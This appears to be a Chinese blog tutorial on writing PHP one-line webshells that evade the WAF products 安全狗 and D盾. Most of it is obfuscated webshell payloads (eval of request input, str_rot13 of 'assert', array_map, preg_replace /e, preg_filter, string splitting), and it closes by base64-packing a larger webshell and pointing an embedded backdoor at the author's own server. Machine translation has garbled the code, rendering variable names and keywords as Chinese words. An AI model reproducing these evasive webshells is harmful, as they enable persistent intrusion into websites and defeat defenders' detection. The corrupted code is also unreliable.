本篇内容主要讲解“网站管理权限免杀怎么实现”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习”网站管理权限免杀怎么实现”吧!
一句话木马
在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。
最常见的php一句话木马
& lt; ? php , @eval ($ _POST [& # 39; x # 39;]); ?在
这个一句话木马由两部分组成,eval用来执行接收的代码。$ _POST [& # 39; x # 39;]来接收数值。
本着这个原则,尝试改写一句话木马绕过WAF。
搜集了几个常用的php函数
执行代码的eval,断言,preg_replace
接收数据的$ _POST, $ _GET, $ _REQUEST
php一句话免杀
函数函数
& lt; php ? $ c=函数(& # 39;nffreg& # 39;); $ c ($ _REQUEST [& # 39; x # 39;]); 祝辞;
函数函数来替代断言。该函数对字符串执行ROT13编码.ROT13编码就是把每个字母在字母表中移动13位。
测试发现无法绕过安全狗。修改一下。
& lt; php ? function xiaoma(美元){ $ c=函数(& # 39;nffreg& # 39;); $ c(美元); } xiaoma ($ _REQUEST [& # 39; x # 39;]); 祝辞;
即可绕过安全狗。
& lt; php ? class 一个{ function xiaoma ($ x) { $ c=函数(& # 39;n ! ff !你! nffreg& # 39;); 美元str=爆炸(& # 39;! & # 39;c)美元[3]; str美元($ x); } } $测试=new 一个(); 测试→美元xiaoma ($ _REQUEST [& # 39; x # 39;]); 祝辞;
再次修改,加了爆炸函数分割字符串,类封装类。可绕过D盾。
到函数
到()函数将函数作用到数组中的每个值上,并返回一个新的数组。
& lt; php ? $ a1=阵列(“1234”,“123456“); $ a2=数组(@ $ _REQUEST [& # 39; x # 39;],“1234“); 美元美元=到(null, a1, a2美元)[0][1]; 断言(美元); 祝辞;
即可绕过安全狗。
array_key函数
array_key()函数也是返回包含数组的一个新数组。
& lt; php ? 一系列=美元($ _REQUEST [& # 39; x # 39;]=在“3“); b=中的美元(美元)[0]; eval ($ b); 祝辞;
索引数组变化为关联数组。
即可绕过安全狗,D盾。
preg_replace函数
用来正则匹配的一个函数。
& lt; php ? function func () { return $ _REQUEST [& # 39; x # 39;]; } preg_replace(“/测试/e", func(),“小姐:am test"); ?在
/e用来当做php代码解析.5.6版本以下实用。
测试可绕过安全狗和D盾。
preg_filter函数
根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。
& lt; php ? 一美元=preg_filter (& # 39;/\ s +/& # 39;, & # 39; & # 39;, & # 39; as s er t # 39;); 美元($ _REQUEST [& # 39; x # 39;]); ?在
也可以绕过D盾安全狗。
其他
& lt; php ? function 测试(美元){ arr 美元;=,阵列(& # 39;一个# 39;& # 39;& # 39;,& # 39;& # 39;,& # 39;e # 39;, & # 39; " # 39;, & # 39; t # 39;); func 美元;=,& # 39;& # 39;; (i=0; i<美元计数(arr);美元我+ +),{=$函数func。arr美元($ i); } $函数=substr (func美元,6); func美元(美元); } 测试($ _REQUEST [& # 39; x # 39;]); ?在
也可以绕过D盾安全狗。
php免杀大马
正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。
将大马eval函数变为退出或者echo.burp抓取源代码。
将源代码拷贝下来,审计发现给源码存在一处后门。
base64解码一下
哦! ! !真是可以。
将该base64地址修改为自己的vps地址。嘻嘻。
那现在只要eval函数可以执行这传base64的字符串就可以啦。